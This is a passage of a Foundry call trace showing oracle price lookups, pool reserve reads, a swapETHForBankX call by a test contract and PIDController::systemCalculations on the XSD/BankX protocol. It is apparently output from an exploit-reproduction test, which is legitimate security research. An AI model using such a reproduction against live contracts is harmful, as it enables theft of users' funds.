    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   ├─ [5656] XSD::xag_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [4162] 0x25E084A3B5dAb1F8272BBcC9E2935430069DB8Ff::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x817326922c909b16944817c207562B25C4dF16aD::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x168f55dFe619E37fe2393c3bA3c831647F8617c0::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 125646 [1.256e5], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 125646 [1.256e5]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419228878 [3.689e19], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 36893488147419228878 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000088577cf8
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000015d08ee
    │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   ├─ [7181] XSD::xsd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   ├─ [7181] XSD::xsd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   ├─ [5620] XSD::eth_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   ├─ [7181] XSD::xsd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   ├─ [5656] XSD::xag_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [4162] 0x25E084A3B5dAb1F8272BBcC9E2935430069DB8Ff::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x817326922c909b16944817c207562B25C4dF16aD::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x168f55dFe619E37fe2393c3bA3c831647F8617c0::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 125646 [1.256e5], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 125646 [1.256e5]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419228878 [3.689e19], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 36893488147419228878 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000088577cf8
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000015d08ee
    │   │   │   │   │   │   │   │   ├─ [405] XSD::totalSupply() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 20000547033338243084561810 [2e25]
    │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   ├─ [5620] XSD::eth_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   ├─ [19700] 0xED024d771261D765B9Dc7b0947ef271ea006248F::allocatedSupply() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [12384] 0xE97E0f2a6f70176c757c82b5c392f93C34D99fA8::allocatedSupply() [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [2395] 0x2946Ca638EB11830E83Feaa130aA8B13d37C3772::bankx_minted_count() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   │   │   │   ├─ [2327] 0x4d369BD339709021267E92702A9E4cE30be85706::totalSupply() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 472721303262100063425570406 [4.727e26]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000001941a47e04bc64e
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000001941a47e04bc64e
    │   │   │   │   │   │   │   │   ├─ [7233] XSD::bankx_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   ├─ [369] 0x224E13D9eAB11eDc09411ef4bF800791a7EF6135::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1347232252051346746666623 [1.347e24], 2600870202054432854 [2.6e18], 1695698658 [1.695e9]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000198
    │   │   │   │   │   │   │   │   ├─ [369] 0x224E13D9eAB11eDc09411ef4bF800791a7EF6135::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 1347232252051346746666623 [1.347e24], 2600870202054432854 [2.6e18], 1695698658 [1.695e9]
    │   │   │   │   │   │   │   │   ├─ [5620] XSD::eth_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   ├─ [5656] XSD::xag_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [4162] 0x25E084A3B5dAb1F8272BBcC9E2935430069DB8Ff::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x817326922c909b16944817c207562B25C4dF16aD::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x168f55dFe619E37fe2393c3bA3c831647F8617c0::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 125646 [1.256e5], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 125646 [1.256e5]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419228878 [3.689e19], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 36893488147419228878 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000088577cf8
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000015d08ee
    │   │   │   │   │   │   │   │   ├─ [352] 0x2946Ca638EB11830E83Feaa130aA8B13d37C3772::collat_XSD()
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000015b42616817e3414b
    │   │   │   │   │   │   │   │   ├─ [13606] 0x2946Ca638EB11830E83Feaa130aA8B13d37C3772::collatDollarBalance() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [5620] XSD::eth_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   │   ├─ [2534] WBNB::balanceOf(0x2946Ca638EB11830E83Feaa130aA8B13d37C3772) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 77114640440362412 [7.711e16]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 16325857706505293295 [1.632e19]
    │   │   │   │   │   │   │   │   ├─ [407] XSD::global_collateral_ratio() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000f4240
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 81: 0 → 0x00000000000000000000000000000000000000000000e9796663b153f3e2fe48
    │   │   │   │   │   │   │   │   │   @ 68: 0x00000000000000000000000000000000000000000000000000000000651321db → 0x00000000000000000000000000000000000000000000000000000000651324d5
    │   │   │   │   │   │   │   │   │   @ 74: 0x000000000000000000000000000000000000000000000000000000006509ea3f → 0x00000000000000000000000000000000000000000000000000000000651324d5
    │   │   │   │   │   │   │   │   │   @ 70: 0x000000000000000000000000000000000000000000009b307af8cce711d65b26 → 0
    │   │   │   │   │   │   │   │   │   @ 73: 0x000000000000000000000000000000000000000000000000000000006509ea3f → 0
    │   │   │   │   │   │   │   │   │   @ 69: 0x0000000000000000000000000000000000000000000000000000010100000000 → 0x0000000000000000000000000000000000000000000000000000010000000000
    │   │   │   │   │   │   │   │   │   @ 80: 0x000000000000000000000000000000000000000000002c455c13efc2d289e822 → 0x00000000000000000000000000000000000000000000ea49064646c7f559677d
    │   │   │   │   │   │   │   │   │   @ 71: 0x000000000000000000000000000000000000000000000293122dd895edf11aff → 0x00000000000000000000000000000000000000000000025718299d6c9a21c69d
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ [264837] Router::swapETHForBankX{value: 1000000000000}(100)
    │   │   │   │   │   │   │   │   ├─ [369] 0x224E13D9eAB11eDc09411ef4bF800791a7EF6135::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 1347232252051346746666623 [1.347e24], 2600870202054432854 [2.6e18], 1695698658 [1.695e9]
    │   │   │   │   │   │   │   │   ├─ [21974] WBNB::deposit{value: 1000000000000}()
    │   │   │   │   │   │   │   │   │   ├─ emit Deposit(dst: Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48], wad: 1000000000000 [1e12])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x56e26e797598d5291f1150050b5a6538924128b4f9f5326bd3ff0fa4ddb623a8: 0 → 0x000000000000000000000000000000000000000000000000000000e8d4a51000
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   ├─ [8062] WBNB::transfer(0x224E13D9eAB11eDc09411ef4bF800791a7EF6135, 1000000000000 [1e12])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48], to: 0x224E13D9eAB11eDc09411ef4bF800791a7EF6135, value: 1000000000000 [1e12])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x56e26e797598d5291f1150050b5a6538924128b4f9f5326bd3ff0fa4ddb623a8: 0x000000000000000000000000000000000000000000000000000000e8d4a51000 → 0
    │   │   │   │   │   │   │   │   │   │   @ 0xac39e8d1c3f5b1760e81cfeda260fe2c94a43b86d84fa720a00ff60919b9a748: 0x000000000000000000000000000000000000000000000000241825ab345a5856 → 0x0000000000000000000000000000000000000000000000002418269408ff6856
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [64946] 0x224E13D9eAB11eDc09411ef4bF800791a7EF6135::swap(100, 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   │   │   │   ├─ [27887] 0x4d369BD339709021267E92702A9E4cE30be85706::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 100)
    │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x224E13D9eAB11eDc09411ef4bF800791a7EF6135, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 100)
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 0xd8d0312af4c8b0b81f60cd94bd829aa23ee06a64e85ff516f3d299e137bca62f: 0x000000000000000000000000000000000000000000011d499b52624f627e6e7f → 0x000000000000000000000000000000000000000000011d499b52624f627e6e1b
    │   │   │   │   │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 100
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   ├─ [606] 0x4d369BD339709021267E92702A9E4cE30be85706::balanceOf(0x224E13D9eAB11eDc09411ef4bF800791a7EF6135) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1347232252051346746666523 [1.347e24]
    │   │   │   │   │   │   │   │   │   ├─ [534] WBNB::balanceOf(0x224E13D9eAB11eDc09411ef4bF800791a7EF6135) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 2600871202054432854 [2.6e18]
    │   │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 1347232252051346746666523 [1.347e24], reserve1: 2600871202054432854 [2.6e18])
    │   │   │   │   │   │   │   │   │   ├─ emit Swap(sender: Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48], amount0In: 0, amount1In: 1000000000000 [1e12], amount0Out: 100, amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 60: 0x65124ee2000000000000241825ab345a5856000000011d499b52624f627e6e7f → 0x651324d50000000000002418269408ff6856000000011d499b52624f627e6e1b
    │   │   │   │   │   │   │   │   │   │   @ 61: 0x0000000000000000000000000000000000304892a30b7829a67e7a9d18c82205 → 0x00000000000000000000000000000000003063a437198266a37c96a1eef17c3a
    │   │   │   │   │   │   │   │   │   │   @ 62: 0x00000000000000000000000003ae2cbae6ae076020cc330e5a55a576204854b0 → 0x00000000000000000000000003b4c7c5d3221454fa34e34098aadd571817eb2d
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   ├─ [146175] PIDController::systemCalculations()
    │   │   │   │   │   │   │   │   │   ├─ [606] 0x4d369BD339709021267E92702A9E4cE30be85706::balanceOf(0x224E13D9eAB11eDc09411ef4bF800791a7EF6135) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1347232252051346746666523 [1.347e24]
    │   │   │   │   │   │   │   │   │   ├─ [7233] XSD::bankx_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   │   ├─ [369] 0x224E13D9eAB11eDc09411ef4bF800791a7EF6135::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1347232252051346746666523 [1.347e24], 2600871202054432854 [2.6e18], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000198
    │   │   │   │   │   │   │   │   │   ├─ [405] XSD::totalSupply() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 20000547033338243084561810 [2e25]
    │   │   │   │   │   │   │   │   │   ├─ [7181] XSD::xsd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   │   ├─ [352] 0x2946Ca638EB11830E83Feaa130aA8B13d37C3772::collat_XSD()
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000015b42616817e3414b
    │   │   │   │   │   │   │   │   │   ├─ [407] XSD::global_collateral_ratio() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000f4240
    │   │   │   │   │   │   │   │   │   ├─ [5656] XSD::xag_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0x25E084A3B5dAb1F8272BBcC9E2935430069DB8Ff::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x817326922c909b16944817c207562B25C4dF16aD::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x168f55dFe619E37fe2393c3bA3c831647F8617c0::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 125646 [1.256e5], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 125646 [1.256e5]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419228878 [3.689e19], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 36893488147419228878 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000088577cf8
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000015d08ee
    │   │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   ├─ [5656] XSD::xag_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4162] 0x25E084A3B5dAb1F8272BBcC9E2935430069DB8Ff::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x817326922c909b16944817c207562B25C4dF16aD::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x168f55dFe619E37fe2393c3bA3c831647F8617c0::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 125646 [1.256e5], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 125646 [1.256e5]
